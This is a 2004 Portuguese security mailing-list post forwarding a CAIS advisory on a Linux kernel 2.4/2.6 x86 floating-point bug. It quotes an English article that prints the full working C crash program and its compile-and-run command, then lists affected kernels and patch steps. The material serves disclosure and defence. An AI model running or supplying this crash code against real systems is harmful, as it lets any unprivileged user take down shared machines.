[SECURITY-L] CAIS-Alerta: Vulnerabilidade no kernel do Linux
CSIRT - UNICAMP
security em unicamp.br
Qua Jun 16 09:28:43 -03 2004
----- Forwarded message from Centro de Atendimento a Incidentes de Seguranca <cais em cais.rnp.br> -----
From: Centro de Atendimento a Incidentes de Seguranca <cais em cais.rnp.br>
Subject: CAIS-Alerta: Vulnerabilidade no kernel do Linux
To: rnp-alerta em cais.rnp.br, rnp-seg em cais.rnp.br
Date: Mon, 14 Jun 2004 16:56:28 -0300 (BRST)
-----BEGIN PGP SIGNED MESSAGE-----
Prezados,
O CAIS teve conhecimento sobre a existencia de um codigo malicioso que,
quando executado em um sistema Linux vulneravel, pode causar o travamento
do sistema e consequente negacao de servicos.
Segundo a fonte do alerta, o problema se manifesta quando o codigo em
questao e' compilado com o GCC versoes 3.0, 3.1, 3.2, 3.3 ou 3.3.2, e e'
executado em sistemas rodando o kernel do Linux nas versoes 2.4.2x ou
2.6.x em arquitetura x86. Sistemas utilizando os processadores AMD64
tambem podem ser afetadas.
O problema se torna mais serio devido ao fato do usuario que compila e
executa o programa nao necessitar ter acesso privilegiado ao sistema.
Assim, qualquer usuario que tenha acesso a um shell no sistema podera
causar o travamento da maquina.
Sistemas afetados:
Sistemas utilizando os seguintes kernels foram testados e sao
comprovadamente vulneraveis:
. Kernel Linux 2.6.x
. 2.6.7-rc2
. 2.6.6 (vanilla)
. 2.6.6-rc1 SMP
. 2.6.6 SMP
. 2.6.5-gentoo
. 2.6.5-mm6
. 2.6.5 (fedora core 2 vanilla)
. Kernel Linux 2.4.2x
. 2.4.26 vanilla
. 2.4.26, grsecurity 2.0 config
. 2.4.26-rc1 vanilla
. 2.4.26-gentoo-r1
. 2.4.22
. 2.4.22-1.2188 Fedora FC1 Kernel
. 2.4.18-bf2.4 (debian woody vanilla)
. Kernel com patches grsecurity
. Kernel 2.5.6 SMP
. Kernel 2.6.6 SMP do Linux.
Alem disso, outras versoes de kernel da serie 2.4 e 2.6 podem ser afetadas
por esta vulnerabilidade.
Sistemas *nao* afetados:
O codigo malicioso nao causa qualquer estrago e termina exibindo a
mensagem de erro "Floating point exception" nos sistemas rodando as
seguintes versoes de kernel:
. Linux nudge 2.6.5-1um i686 (o kernel do User Mode Linux) Dylan
Smith
. Linux Kernel 2.6.4 SMP com o patch staircase scheduler Guille
aplicado
. Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
. Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
. Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
. 2.2.19-kernel
. kernel 2.6.5-1um do User Mode Linux. E' possivel que outras
versoes de kernel do User Mode Linux tambem o sejam.
Correcoes disponiveis:
Para corrigir o problema recomenda-se a atualizacao do kernel e aplicacao
de um patch para o kernel utilizado, de acordo com o que esta descrito em:
. http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Mais informacoes:
. New Kernel Crash-Exploit discovered
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
O CAIS recomenda que os administradores mantenham seus sistemas e
aplicativos sempre atualizados, de acordo com as ultimas versoes e
correcoes oferecidas pelos fabricantes.
Os Alertas do CAIS tambem sao oferecidos no formato RSS/RDF:
http://www.rnp.br/cais/alertas/rss.xml
Atenciosamente,
################################################################
# CENTRO DE ATENDIMENTO A INCIDENTES DE SEGURANCA (CAIS) #
# Rede Nacional de Ensino e Pesquisa (RNP) #
# #
# cais em cais.rnp.br http://www.cais.rnp.br #
# Tel. 019-37873300 Fax. 019-37873301 #
# Chave PGP disponivel http://www.rnp.br/cais/cais-pgp.key #
################################################################
>
>http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
>
>New Kernel Crash-Exploit discovered
>Published 2004-06-11 by xiando, v2.1.5, last updated 2004-06-14.
>A bug lets a simple C program crash the kernel, effectively locking the
>whole system. Affects both 2.4.2x and 2.6.x kernels on the x86 architecture.
>
> 1. The Evil Code
> 2. The Crashing Kernels
> 3. The safe kernels
> 4. The threat
> 5. How to protect yourself
> * 5.1. Patch for 2.4.2x (vanilla) Kernels
> o 5.1.1. 2.4.26
> o 5.1.2. 2.4.25
> o 5.1.3. 2.4.2x
> * 5.2. Kernel 2.4.26-rc3-gentoo
> * 5.3. 2.6.xx kernels
> * 5.4. amd64
> 6. Bug reports
>
>1. The Evil Code
>
>Running this simple C program crashes the Linux kernel.
>
>crash.c.txt
>
> #include <sys/time.h>
> #include <signal.h>
> #include <unistd.h>
>
> static void Handler(int ignore)
> {
> char fpubuf[108];
> __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
> write(2, "*", 1);
> __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
> }
>
> int main(int argc, char *argv[])
> {
> struct itimerval spec;
> signal(SIGALRM, Handler);
> spec.it_interval.tv_sec=0;
> spec.it_interval.tv_usec=100;
> spec.it_value.tv_sec=0;
> spec.it_value.tv_usec=100;
> setitimer(ITIMER_REAL, &spec, NULL);
> while(1)
> write(1, ".", 1);
>
> return 0;
> }
>
>
>
>This bug is confirmed to be present when the code is compiled with GCC
>version 3.0, 3.1, 3.2, 3.3 and 3.3.2 and used on Linux kernel versions
>2.4.2x and 2.6.x on x86 and amd64 systems.
>
>2. The Crashing Kernels
>
>Minor numbers are versions verified, this is just the top the iceberg:
>
> * Linux 2.6.x
> o 2.6.7-rc2
> o 2.6.6 (vanilla)
> o 2.6.6-rc1 SMP (varified by blaise)
> o 2.6.6 SMP (verified by riven)
> o 2.6.5-gentoo (verified by RatiX)
> o 2.6.5-mm6 - (verified by Mariux)
> o 2.6.5 (fedora core 2 vanilla)
> * Linux 2.4.2x
> o 2.4.26 vanilla
> o 2.4.26, grsecurity 2.0 config
> o 2.4.26-rc1 vanilla
> o 2.4.26-gentoo-r1
> o 2.4.22
> o 2.4.22-1.2188 Fedora FC1 Kernel
> o 2.4.18-bf2.4 (debian woody vanilla)
>
>Even grsecurity-patched kernels crash. "I would have hoped that grsec would
>have blocked or logged something, but nothing appeared in the logs." Vincent
>
>3. The safe kernels
>
>This code does nothing but exit with the error message Floating point
>exception and can not do any damage to systems running
>
> * Linux nudge 2.6.5-1um i686 (the user-mode Linux kernel) Dylan Smith
> * Linux Kernel 2.6.4 SMP patched with staircase scheduler Guille
> * Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
> * Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
> * Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
> * 2.2.19-kernel
>
>It is unclear why these specific Gentoo patch sets of the 2.4.26 kernel are
>safe. Other versions of the Gentoo kernel are not.
>
>The user-mode Linux kernel 2.6.5-1um is safe. I assume this means other
>versions of user mode Linux are safe.
>
>Linux Kernel 2.6.4 SMP with patches has been reported to be safe. Reporter
>uses a version patched with Con Kolivas Staircase scheduler (but it only
>affects to the task scheduler). Gcc version 3.3.3. "System did not crash, I
>left the crash program 10 minutes and after that i killed the task and I
>continued using my system". Guille
>
>The glitch is verified present in Linux 2.5.6 SMP and Linux 2.6.6 SMP.
>
>The bug is not present in 2.2.19, it seems this bug only affects 2.4 and
>later.
>
>4. The threat
>
>Using this exploit to crash Linux systems requires the (ab)user to have
>shell access. The program works on any normal user account, root access is
>not required. This exploit has been reported used to take down several
>"lame free-shell providers" servers (this is illegal in most parts of the
>world and strongly discouraged).
>
>This code only works on x86 Linux machines. This code does not compile
>(makes no executable) on sparc64 sun4u TI UltraSparc II (BlackBird). This
>doesn't affect NetBSD Stable.
>
>Check your own system yourself if you are wondering if this affects you.
>Better safe than sorry. Assume it will crash, sync (even unmount) your file
>systems before testing. If your system is a production server with 1000 on
>line users then do not test this code on that box.
>
>5. How to protect yourself
>
>The last days were frustrating. Compiling a large number of different
>kernel versions just to find that gcc crash.c -o evil && ./evil halts the
>system is quite dull. I hoped some kernels would be unaffected because
>2.4.26-rc3-gentoo and 2.4.26_pre6-gentoo are, but sadly almost all kernels
>versions die when evil is executed.
>
>The Linux Kernel mailing list is found to the right of this article. You
>may find solutions there not mentioned on this page. The author does
>subscribe and plans to post (better) solutions here as they appear.
>
>5.1. Patch for 2.4.2x (vanilla) Kernels
>
>This just in: 2.4.26_i387.h_patch.txt may be a better solution for 2.4.xx
>kernels (gentoo bugzilla). not tested by yours truly
>
>Stian Skjelstad mailed me a working patch 2.4 kernels.
>
>5.1.1. 2.4.26
>
>I applied it, confirmed that it works with the vanilla 2.4.26 kernel and
>made a diff (diff -ur linux-2.4.26/kernel/signal.c
>linux-2.4.26-x/kernel/signal.c
>>signal.c-2.4.26.patch.txt). (signal.c-2.4.26.patch.txt)
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
> your own kernel
> 2. Download linux-2.4.26.tar.bz2 from your local Linux Kernel Mirror
> 3. Unpack the kernel source and make a symbolic link:
> * cd /usr/src/
> * tar xfvj linux-2.4.26.tar.bz2
> * ln -s linux-2.4.26 linux
> 4. Download the patch for 2.4.26: signal.c-2.4.26.patch.txt
> 5. Apply the patch
> * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.26.patch.txt
> 6. Configure and compile as usual.
>
>5.1.2. 2.4.25
>
>There is no difference (diff linux-2.4.25/kernel/signal.c
>linux-2.4.26/kernel/signal.c) between the signal.c included in 2.4.25 and
>2.4.26, apply signal.c-2.4.26.patch.txt to 2.4.25-vanilla.
>
>5.1.3. 2.4.2x
>
>The patch signal.c-2.4.21.patch.txt (diff -ur linux-2.4.21/kernel/signal.c
>linux-2.4.21-xiando/kernel/signal.c > signal.c-2.4.21.patch.txt) is tested
>and works for Kernel 2.4.21 (vanilla).
>
> 1. Get a vanilla 2.4.21 kernel and install it.
> 2. Apply the patch
> * patch -p1 -d /usr/src/linux-2.4.26 <signal.c-2.4.21.patch.txt
> 3. Configure and compile as usual.
>
>signal.c.2.4.20.patch.txt is tested by Charlie Macdonald on RedHat's
>2.4.20-31.9.
>
>5.2. Kernel 2.4.26-rc3-gentoo
>
>2.4.26-rc3-gentoo (gentoo-sources-2.4.26_pre5.patch.bz2) is safe. This is a
>patch set for turning linux-2.4.25 -> 2.4.26-rc3-gentoo.
>
>I have no idea why this kernel version is safe from this exploit. It just
>is. This kernel patch set returns Floating point exception instead of
>locking the system when evil is executed.
>
>This kernel can be used on any Linux system. It does not require any
>Gentoo-only tools.
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
> your own kernel
> 2. Download linux-2.4.25.tar.bz2 from your local Linux Kernel Mirror
> 3. Get the patch set for Gentoo 2.4.26-rc3-gentoo (mirror1) (mirror2) aka
>2.4.26_pre5:
> * wget http://re.a.la/gs (2,2M)
> 4. Unpack the 2.4.25 kernel source:
> * cd /usr/src/
> * tar xfvj linux-2.4.25.tar.bz2
> 5. Apply the Gentoo patchset:
> * patch -p1 -d /usr/src/linux-2.4.25
><gentoo-sources-2.4.26_pre5.patch
> 6. Rename the kernel and make a symlink from /usr/src/linux:
> * mv linux-2.4.25 linux-2.4.26-rc3-gentoo
> * ln -s linux-2.4.26-rc3-gentoo linux
> 7. The Makefile now refers to this kernel as -rc5-gentoo, but when you
>compile your kernel it claims to be 2.4.26-rc3-gentoo. I assume this is
>because the original Gentoo ebuild changed the version in the Makefile or
>another configuration file to make these match. Open the Makefile in your
>favorite editor and and change line 4 to say -rc3-gentoo:
> * cd linux-2.4.26-rc3-gentoo
> * nano -w Makefile
> * "EXTRAVERSION = -rc5-gentoo" -> "EXTRAVERSION = -rc3-gentoo"
> 8. Configure your kernel
> * Using your old config: cp /usr/src/linux-oldversion/.config
>.config && make oldconfig
> * The Linux kernel can be configured with make menuconfig (CLI)
> and make xconfig (GUI)
> 9. Compile your new kernel and install as usual:
> * make dep bzImage modules modules_install
> * mount /boot (some distributions mount /boot on startup)
> * cp arch/i386/boot/bzImage /boot
> * You may want to call your new kernel something else and edit
> Grub or Lilos configuration.
>
>Congratulations. You are now running the 2.4.26-rc3-gentoo kernel.
>
>5.3. 2.6.xx kernels
>
>A patch for i387.h (2.6.7-rc3-bk5_i387.h.patch.txt) included in kernel
>2.6.7-rc3-bk5 has been tested successfully on 2.6.5 and 2.6.7-rc3 by Marc
>Ballarin
>
>It is tested successfully on Linux-2.6.7-rc2 by yours truly.
>
>The i387.h patch seems to be the best solution. When evil is executed it
>does not freeze the system, but unlike the other alternative patches it
>does leave evil running at 99.9% CPU. It can be stopped with ctrl-c, kill
>and killall.
>
> 1. Read the Kernel Rebuild Guide if this is your first time compiling
> your own kernel
> 2. Get a kernel from kernel.org and unpack it to /usr/src
> 3. Get 2.6.7-rc3-bk5_i387.h.patch.txt
> 4. patch -p1 -d /usr/src/linux-2.6.7-rc2 <2.6.7-rc3-bk5_i387.h.patch.txt
> 5. Follow the usual steps.
>
>Other solutions:
>
> * Andi Kleen has posted a patch for linux-2.6.7rc3 in the linux-kernel
>mail list available at
> o PATCH fix for Re: timer + fpu stuff locks my console race.
> o http://lkml.org/lkml/2004/6/12/88
> o Raw message: andi_kleen_patch.txt
> * Stian Skjelstad's patch also works with 2.6.7
> o http://lkml.org/lkml/2004/6/12/64
> * Sergey Vlasov has a solution at
> o http://lkml.org/lkml/2004/6/12/81
>
>5.4. amd64
>
>IMPORTANT: amd64 is affected as well.
>
>The fix is the same as on x86 (it's included in 2.6.7-rc3-bk6). The file
>that needs the change is include/asm-x86_64/i387.h Ballarin Marc
>
>6. Bug reports
>
> * The exploit was reported as gcc bug 15905 2004-06-09.
> * This is reported to the linux-kernel list with the subject timer + fpu
>stuff locks my console race.
> * Reported to Gentoo Bugzilla as bug 53804
>
>The lastest version of this documents is available at
>http://linuxreviews.org/ - Page source:
>
> * t2t:2004-06-11_kernel_crash.t2t.tar.bz2
>
>Copyright (c) 2000-2004 Øyvind Sæther. Permission is granted to copy,
>distribute and/or modify this document under the terms of the GNU Free
>Documentation License, Version 1.2 or any later version published by the
>Free Software Foundation; with no Invariant Sections, no Front-Cover Texts,
>and no Back-Cover Texts. A copy of the license is included in the section
>entitled "GNU Free Documentation License"
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQCVAwUBQM4C8+kli63F4U8VAQEsxAQAqUAf6sFF+gkPhhVsxrboTcnMlCzTCoYa
pDl/fBggn/DlDXIPM4F7EJfMAtGsi9x8OiiO2g0rqI0JUdBAm500wcwCVnn91R9z
sZkB+8vx+6vzeHriHDLInRYETWOVKyrMGPnMGPwdfF3uV22Wfs7Ry90W0bkigsY1
8xYl1Tw9x70=
=3R3M
-----END PGP SIGNATURE-----
----- End forwarded message -----
Mais detalhes sobre a lista de discussão SECURITY-L